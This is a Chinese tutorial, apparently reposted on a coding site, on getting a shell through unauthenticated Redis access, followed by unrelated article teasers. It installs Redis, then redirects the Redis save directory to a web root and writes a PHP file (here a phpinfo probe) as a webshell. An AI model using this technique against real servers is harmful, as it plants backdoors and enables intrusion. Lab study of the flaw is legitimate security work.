数据库服务类--Redis--未授权访问终端Getshell

免责声明:本文仅做技术交流与学习.

目录

前提条件:

windows上开启redis服务:

Linux上创建&开启redis服务:

操作:

1-连接靶机redis

2-写入webshell

3-访问后门

redis--->webshell

Redis未授权访问漏洞复现与利用 - 知乎 (zhihu.com)

前提条件:

端口开放(6379)

目录结构清晰

windows上开启redis服务:

windows:
redis-server.exe redis.windows.conf
redis-cli.exe -h 127.0.0.1 -p 6379

Linux上创建&开启redis服务:

 

1、下载
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
​
2、解压编译
tar xzvf redis-2.8.17.tar.gz  #解压安装包
cd redis-2.8.17  # 进入redis目录
make #编译
​
3、配置及启动
cd src/ #进入src目录 
cp redis-server /usr/bin/ 
cp redis-cli /usr/bin/      #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd ..   # 返回上一级目录
cp redis.conf /etc/     #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf  # 使用/etc/目录下的redis.conf文件中的配置启动redis服务
 

 

操作:
 

1-连接靶机redis
 

 

2-写入webshell
 

config set dir /www/wwwroot/IP
config  set dbfilename test.php
set test "<?phpphpinfo();?>"
bgsave
save
 

 
 

 
目录,文件名自己改
 
写入内容自己改...
 

 

3-访问后门路径
 

--上线...
 

 












本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/2106.shtml


如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!











相关文章










vscode自动生成项目目录结构








vscode自动生成项目目录结构




目录结构如下&#xff1a; 生成步骤如下&#xff1a; 
vscode安装插件&#xff0c;project-tree安装之后按ctrlshiftp&#xff0c;并输入Project Tree回车点击要生成目录的项目&#xff0c;回车将项目目录生成并存储到README.md中




阅读更多...

















vue3中web前端JS动画案例(四)侧边栏横幅效果-右下角广告-淘宝案例








vue3中web前端JS动画案例(四)侧边栏横幅效果-右下角广告-淘宝案例




myJsAnimation.js, 这里使用了上次封装的动画方法&#xff0c;并进行了改造 /*** 动画的函数* dom 当前对象* JSON 传入元素对象的属性 {"width": 300, "opacity": 50}* * -------------------- 多物体运动&#xff0c;同时运动 ---传入JSON-------------*…




阅读更多...

















Nginx下PHP连接到GBase 8s数据库 - PDO_GBASEDBT方式








Nginx下PHP连接到GBase 8s数据库 - PDO_GBASEDBT方式




PHP可以通过odbc&#xff0c;pdo_odbc和pdo_gbasedbt三种方式连接到GBase 8s数据库&#xff0c;这三种方式均需要通过CSDK客户端工具。 操作系统&#xff1a;CentOS 7.9 x86_64 
必要组件&#xff1a; 
php及扩展&#xff0c;如php-fpm/php-odbc/php-pdo等nginx服务gcc/gcc-c 
…




阅读更多...

















Nodejs 第六十七章(OpenAI)








Nodejs 第六十七章(OpenAI)




OpenAI 
OpenAI是一个人工智能研究实验室和技术公司&#xff0c;致力于推动人工智能的发展和应用 
OpenAI最著名的项目之一是GPT&#xff08;Generative Pre-trained Transformer&#xff09;系列模型&#xff0c;其中包括了GPT-3&#xff0c;它是迄今为止最大规模的语言模型之…




阅读更多...

















Python | Leetcode Python题解之第43题字符串相乘








Python | Leetcode Python题解之第43题字符串相乘




题目&#xff1a; 题解&#xff1a; 
class Solution:def multiply(self, num1: str, num2: str) -> str:if num1  "0" or num2  "0":return "0"m, n  len(num1), len(num2)ansArr  [0] * (m  n)for i in range(m - 1, -1, -1):x  int(num1[i…




阅读更多...

















BI建设案例:FineBI大数据分析平台助力工程机械行业降本增效








BI建设案例:FineBI大数据分析平台助力工程机械行业降本增效




工程机械行业作为国民经济的重要支柱&#xff0c;产品多样化、应用广泛&#xff0c;市场集中度高。其上游涉及原材料和核心零部件&#xff0c;下游则与房地产、基建工程和采矿等行业紧密相连。 
如今&#xff0c;中国已崛起为全球工程机械制造大国&#xff0c;各类机械产品产量…




阅读更多...

















Macs Fan Control Pro for Mac:全面优化Mac风扇控制软件








Macs Fan Control Pro for Mac:全面优化Mac风扇控制软件




Macs Fan Control Pro for Mac是一款专为苹果电脑用户设计的风扇控制软件&#xff0c;旨在通过精确的风扇速度调节&#xff0c;全面优化Mac的散热性能&#xff0c;确保系统始终运行在最佳状态。 Macs Fan Control Pro for Mac中文版下载 该软件具备实时监控功能&#xff0c;能够…




阅读更多...

















【CSS】grid 布局一行自动填充,每行最大限定px








【CSS】grid 布局一行自动填充,每行最大限定px




<div class"model-plat-content"><div class"mode-card" v-for"i in 30"></div></div>.model-plat-content {display: grid;// 解释&#xff1a; repeat(auto-fit, minmax(250px, 1fr)) 自动填充&#xff0c;每行最大25…




阅读更多...

















ubuntu apt update:The repository ‘xxx‘ is not signed.报错解决办法(未解决)








ubuntu apt update:The repository ‘xxx‘ is not signed.报错解决办法(未解决)




文章目录 报错原因及解决办法 报错 rootjax:~# apt update
Get:1 file:/var/cuda-repo-l4t-11-4-local  InRelease [1575 B]
Get:2 file:/var/cudnn-local-repo-ubuntu2004-8.4.1.50  InRelease [1575 B]
Get:1 file:/var/cuda-repo-l4t-11-4-local  InRelease [1575 B]
Get:2 …




阅读更多...

















通过创新的MoE架构插件缓解大型语言模型的世界知识遗忘问题








通过创新的MoE架构插件缓解大型语言模型的世界知识遗忘问题




在人工智能领域&#xff0c;大型语言模型&#xff08;LLM&#xff09;的微调是提升模型在特定任务上性能的关键步骤。然而&#xff0c;一个挑战在于&#xff0c;当引入大量微调数据时&#xff0c;模型可能会遗忘其在预训练阶段学到的世界知识&#xff0c;这被称为“世界知识遗忘…




阅读更多...

















使用vue实现一个添加和编辑的功能








使用vue实现一个添加和编辑的功能




要使用Vue实现添加和编辑的功能&#xff0c;你需要创建一个Vue组件&#xff0c;该组件可以处理用户输入&#xff0c;并在需要时更新或添加数据。以下是一个简单的示例&#xff0c;展示了如何使用Vue实现添加和编辑列表项的功能&#xff1a; 
创建Vue组件 
首先&#xff0c;你需…




阅读更多...

















vue 脚手架创建








vue 脚手架创建




脚手架创建 
介绍 
脚手架是什么呢&#xff0c;就是vue自动创建脚手架的项目模板&#xff0c;用于搭建项目的整体骨架&#xff0c;就比如后端开发时&#xff0c;咱们可以创建一个空项目&#xff0c;一步步创建为mvc项目&#xff0c;但是vs封装了mvc的框架&#xff0c;我们可以直…




阅读更多...

















【Python-Pygame】








【Python-Pygame】




Python-Pygame ■ Pygame-简介■ Pygame-安装■ Pygame-Rect区域位置■ Pygame-Draw绘图函数■ Pygame-■ Pygame-■ Pygame-■ Pygame-事件监听■ Pygame-Event事件模块■ Pygame-游戏循环■ Pygame-Display显示模块■ Pygame-Time时间控制■ Pygame-Font文本和字体■ Pygame-…




阅读更多...

















计算机网络-IS-IS链路状态数据库同步








计算机网络-IS-IS链路状态数据库同步




在建立IS-IS邻接关系之后&#xff0c;路由器开始发送LSP报文进行链路状态数据库进行同步。 一、链路状态数据库同步 LSP&#xff08; Link State PDU&#xff0c;链路状态报文&#xff09; 用于交换链路状态信息。LSP分为两种&#xff1a;Level–1 LSP和Level–2 LSP。Level–1…




阅读更多...

















STC 8F无线通讯语言模块测试








STC 8F无线通讯语言模块测试




/*无线通讯语言模块测试PAST 2020 1  15 L142 CODE2257**/               #include     <REG52.H>               #include     <intrins.H>               #include     "stdio.h"               #define      uint unsigned int                 #defi…




阅读更多...

















一文学会Amazon transit GateWay








一文学会Amazon transit GateWay




这是一个中转网关&#xff0c;使用时候需要在需要打通的VPC内创建一个挂载点&#xff0c;TGW会管理一张路由表来决定流量的转发到对应的挂载点上。本质上是EC2的请求路由到TGW&#xff0c;然后在查询TGW的路由表来再来决定下一跳&#xff0c;所以需要同时修改VPC 内子网的路由表…




阅读更多...

















力扣刷题学习python(跟随视频学着刷)








力扣刷题学习python(跟随视频学着刷)




使用入门 视频链接 
【手把手带你刷Leetcode力扣&#xff5c;各个击破数据结构和算法&#xff5c;大厂面试必备技能【已完结】-哔哩哔哩】 https://b23.tv/vIcRT61 时空复杂度 时间&#xff1a; 
空间&#xff1a;主要有O(1)和O(n)两种 数组 特点&#xff1a;适合读多写少 操作…




阅读更多...

















系统架构设计








系统架构设计




领域驱动设计(DDD)_骆驼整理说-CSDN博客 
SpringCloud、Springboot、nacos集成依赖jar包版本对比&#xff1a; 
https://mvnrepository.com/artifact/com.alibaba.cloud/spring-cloud-starter-alibaba-nacos-discovery 
https://github.com/xai-org/grok-1/ 
领域驱动设计的原则…




阅读更多...

















Android 开机流程








Android 开机流程




Android12 开机流程 
Android开机流程的意义在于确保系统硬件设备的正确初始化、加载操作系统内核、启动系统服务,并最终使应用程序能够正常运行。它是Android系统启动的基础,保证了系统的可靠性和稳定性。 初始化硬件设备:在开机流程中,引导加载程序会初始化硬件设备,包括…




阅读更多...

















阿赵UE学习笔记——29、Niagara制作火焰效果








阿赵UE学习笔记——29、Niagara制作火焰效果




阿赵UE学习笔记目录 大家好&#xff0c;我是阿赵。   继续学习虚幻引擎&#xff0c;之前简单介绍了Niagara粒子系统&#xff0c;这次用Niagara系统做一个火焰的效果。 
一、创建发射器 和之前介绍的一样&#xff0c;先创建一个空白的发射器&#xff1a;  我把这个发射器命名为…




阅读更多...


















最新文章


















Copyright @ 2022~2023